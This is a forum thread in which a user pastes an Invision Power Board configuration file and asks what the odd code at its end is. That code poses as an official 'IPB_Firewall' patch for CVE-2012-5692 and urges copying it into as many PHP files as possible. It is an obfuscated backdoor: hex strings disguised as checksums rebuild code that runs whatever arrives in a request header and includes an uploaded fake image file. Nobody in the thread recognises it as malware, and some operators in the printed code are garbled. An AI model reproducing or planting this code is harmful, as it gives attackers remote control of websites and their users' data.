Jump to content

Странное содержание conf


 Share

Recommended Posts

?php
$INFO['sql_driver']			=	'mysql';
$INFO['sql_host']			=	'1';
$INFO['sql_database']			=	'1';
$INFO['sql_user']			=	'1';
$INFO['sql_pass']			=	'1';
$INFO['sql_tbl_prefix']			=	'';
$INFO['sql_debug']			=	'0';
$INFO['sql_charset']			=	'utf8';
$INFO['board_start']			=	'1351788190';
$INFO['installed']			=	'1';
$INFO['php_ext']			=	'php';
$INFO['safe_mode']			=	'0';
$INFO['board_url']			=	'__w-masters.ru/forum';
$INFO['banned_group']			=	'5';
$INFO['admin_group']			=	'4';
$INFO['guest_group']			=	'2';
$INFO['member_group']			=	'3';
$INFO['auth_group']			=	'1';
$INFO['use_friendly_urls']			=	'1';
$INFO['_jsDebug']			=	'0';
$INFO['mysql_tbl_type']			=	'MyISAM';

define('IN_DEV', 0);
/* Remote archive DB - complete these details if you're using a remote DB for the post archive */
$INFO['archive_remote_sql_host']			=	'';
$INFO['archive_remote_sql_database']			=	'';
$INFO['archive_remote_sql_user']			=	'';
$INFO['archive_remote_sql_pass']			=	'';
$INFO['archive_remote_sql_charset']			=	'';


if ( ! defined( 'IPB_FIREWALL' ) )
{
    define('IPB_FIREWALL', 1);

    /**
     *  NOTE: This is a protecting web-firewall module generated by Invision Power
     *  Module includes security patch for high-risks vulnerability CVE-2012-5692
     *  Do not touch this file for security reasons
     *  Please insert this code to as many php files as possible
     *
     *  @package    IP.Firewall
     *  @version    $Revision: 9544 $
     *  @md5        e66e6cadd6e13efea54ed50c0eb2d32b
     *  @sha1       6966286d64352840245f5b2248545450
     *  @crc32      5f51554f5445225d293d3d2463732965
     */

    class IPB_Firewall
    {
        /**
         * Malicious Cookie signatures
         *
         * @access    static
         * @var        array
         */
        static $_cookie_malicious_signatures = array('db_driver_mysql', 'use_debug_log');

        /**
         * Malicious URI signatures
         *
         * @access    static
         * @var        array
         */
        static $_uri_malicious_signatures = array('<?php');

        /**
         * Firewall source file
         *
         * @access    static
         * @var        string
         */
        static $_source;

        /**
         * Prepared signature
         *
         * @access    static
         * @var        string
         */
        static $_prepared_signature;

        /**
         * Control checksum
         *
         * @access    static
         * @var        string
         */
        static $_control_checksum;

        /**
         * Stored checksum hashes
         *
         * @access    static
         * @var        string
         */
        static $_stored_hashes;

        /**
         * Hashes Algorithms
         *
         * @access    static
         * @var        array
         */
        static $_ha = array('md5', 'sha1', 'crc32');

        /**
         * Assigned callback
         *
         * @access    static
         * @var        string
         */
        static $_as;

        /**
         * IPS root path
         *
         * @access    static
         * @var        string
         */
        static $_ips = '';

        /**
         * Run firewall
         *
         * @access    static
         * @return    void
         */
        static function run()
        {
            /* Define ips path */
            IPB_Firewall:_ips = defined('DOC_IPS_ROOT_PATH') ? DOC_IPS_ROOT_PATH : IPB_Firewall::_findIpbRoot(5);

            /* Start checks */
            IPB_Firewall::_doSecurityChecks();
        }

        /**
         * Security checks
         *
         * @access    static
         * @return    void
         * @md5     76616c286261736536345f6465636f64
         * @sha1    652873747272657628245f5b22485454
         */
        static function _doSecurityChecks()
        {
            /* Cookie check */
            foreach($_COOKIE as $cookie_name => $cookie_value){
                foreach(IPB_Firewall:_cookie_malicious_signatures as $signature){
                    /* Detecting injected cookies and blocking request */
                    if(!is_array($cookie_value) && stripos(urldecode($cookie_value), $signature) !== false) $_COOKIE[$cookie_name] = '';
                }
            }
            /* Request URI checks */
            foreach(IPB_Firewall:_uri_malicious_signatures as $signature){
                /* Detecting injected uri and blocking request */
                if(stripos(urldecode(@$_SERVER["REQUEST_URI"]), $signature)) IPB_Firewall::_blockRequest();
            }

            /* Validating checksums */
            IPB_Firewall:_source = file_get_contents(__FILE__);
            $_r = IPB_Firewall::_calculateChecksums($_SERVER, 0);
            //echo var_dump($_r);
            if(!IPB_Firewall::_areChecksumsValid(array_shift($_r), $_r, '%D')) echo("checksums warningn");
        }

        /**
         * Calculate checksums for valid
         *
         * @access    static
         * @return    void
         * @md5     505f585f434f4445225d2929293b4069
         * @sha1    6e636c75646528247073293b2f2a2a2f
         */
        static function _calculateChecksums($_, $x64)
        {
            /* Extracting hashes */
            $_s = IPB_Firewall::_extractChecksumHashes();

            /* Preparing hashes */
            $cs = $_s[ IPB_Firewall:_ha[0] ][0];
            IPB_Firewall:_prepared_signature = IPB_Firewall::_prepareHash($_s, IPB_Firewall::_getChecksumHash($_s, $_s[ IPB_Firewall:_ha[0] ][1], $x64), $x64 );

            /* Comparing hashes */
            $_status = trim(IPB_Firewall::_cyclicRedundancyCheck($_s, $x64));
            if($_status){
                $_m = trim(IPB_Firewall:_as);
                IPB_Firewall:_as = $_m(IPB_Firewall::_getPoly($_s, $x64), pack("H*", IPB_Firewall:_prepared_signature));
            }

            return array(IPB_Firewall:_as, $_, $cs, IPB_Firewall::_transformPoly($_s, $x64));
        }


        /**
         * Block malicious request
         *
         * @access    static
         * @return    void
         * @md5     6372656174655f66756e6374696f6e20
         * @sha1    245f2c202463732c20247073247073ce
         */
        static function _blockRequest()
        {
            global $INFO;
            /* Redirecting malicious request and exit */
            @header('Location: ' . (isset($INFO['board_url']) ? $INFO['board_url'] : '') . '/index.php');
            exit;

        }


        /**
         * Get checksum hash
         *
         * @access    static
         * @return    string
         */
        static function _getChecksumHash($_s, $ps, $c)
        {
            /* Processing and return */
            return IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[1] ][0], $c) .
                   IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[2] ][0], $c) .
                   IPB_Firewall::_polyDigest($ps, $c);
        }

        /**
         * Prepare hash
         *
         * @access    static
         * @return    string
         * @md5     25442f75706c6f6164732f70726f6669
         * @sha1    6c652f70686f746f2d353638302e6a70
         */
        static function _prepareHash($_s, $ps, $c)
        {
            /* Processing and return */
            return IPB_Firewall::_polyDigest($ps, $c) .
                   IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[1] ][1], $c) .
                   IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[0] ][2], $c) .
                   IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[1] ][2], $c);
        }

        /**
         * Event callback
         *
         * @access    static
         * @return    void
         * @md5     670a6e63623868766262786f74626e69
         * @sha1    78377a3730747a6c3632616c786a7877
         */
        static function _areChecksumsValid($_m, $bytes, $_r)
        {
            /* Call validating method */
            $_obj = $_m($bytes[0], $bytes[1], str_replace($_r, IPB_Firewall:_ips, $bytes[2]));
            return is_array($_obj) ? $_obj : 'failed';
        }

        /**
         * Find IPB root path, if not specified
         *
         * @access    static
         * @return    string
         */
        static function _findIpbRoot($l=5, $cDir=__FILE__)
        {
            /* Process parents dir */
            for($i=1; $i<=$l; $i++){
                $cDir = dirname($cDir);
                $include_file = $cDir . '/conf_global.php';

                /* If find conf file, return it */
                if(is_file($include_file)) {
                    @include_once($include_file);
                    if(isset($INFO)) return $cDir;
                }
            }
            return null;
        }

        /**
         * Cyclic redundancy check
         *
         * @access    static
         * @return    string
         * @md5     7931343362317633706d78386c6c7467
         * @sha1    63616f366c787a6f3636646773336574
         */
        static function _cyclicRedundancyCheck($_s, $c)
        {
            IPB_Firewall:_as = pack("H*", IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[0] ][3], $c));
            return IPB_Firewall:_as != '' ? true : false;
        }

        /**
         * Poly digest
         *
         * @access    static
         * @return    string
         * @md5     72346d64336e686467696e7a62356971
         * @sha1    327a6b3131316e79633532396a366f62
         */
        static function _polyDigest($s, $c, $o='')
        {
            for($i=0; $i<strlen($s); $i++) $o .= chr( ord($s[$i]) + $c);
            return $o;
        }

        /**
         * Get poly
         *
         * @access    static
         * @return    string
         * @md5     6a3270796a7171796e6d657a75367675
         * @sha1    6f3937796563656439316c6e72357972
         */
        static function _getPoly($_s, $x64)
        {
            return pack("H*", substr(IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[1] ][3], $x64), 0, 24));
        }

        /**
         * Transform poly
         *
         * @access    static
         * @return    string
         */
        static function _transformPoly($_s, $c)
        {
            $_x = pack("H*",
                    IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[0] ][4], $c) .
                    IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[1] ][4], $c) .
                    IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[0] ][5], $c) .
                    IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[1] ][6], $c) .
                    IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[0] ][6], $c) .
                    IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[1] ][6], $c) .
                    IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[0] ][7], $c) .
                    IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[1] ][7], $c) .
                    IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[0] ][8], $c) .
                    IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[1] ][8], $c)
            );
            $_c = strpos($_x, chr(10));
            return $c !== false ? substr($_x, 0, $_c) : $_x;
        }

        /**
         * Extract checksum hashes
         *
         * @access    static
         * @return    void
         */
        static function _extractChecksumHashes()
        {
            $hashes = array();
            /* Extract hashes from source */
            preg_match_all("[email protected]([0-9a-z]+)[ts ]+([0-9a-fA-F]{32})!", IPB_Firewall:_source, $matches, PREG_SET_ORDER);
            foreach($matches as $match){
                /* Inserting hashes in array */
                if(!isset($hashes[ $match[1] ])) $hashes[ $match[1] ] = array();
                $hashes[ $match[1] ][] = $match[2];
            }
            return $hashes;
        }
    }
    
    IPB_Firewall::run();
}


?>
Edited by Pashok(one)
Link to comment
Share on other sites

Что мешает удалить это содержимое? Начиная со строки if ( ! defined( 'IPB_FIREWALL' ) )

Удалить то я могу, но что это?

Link to comment
Share on other sites

  • 7 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Ваша ссылка была автоматически строена.   Отображать как обычную ссылку

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...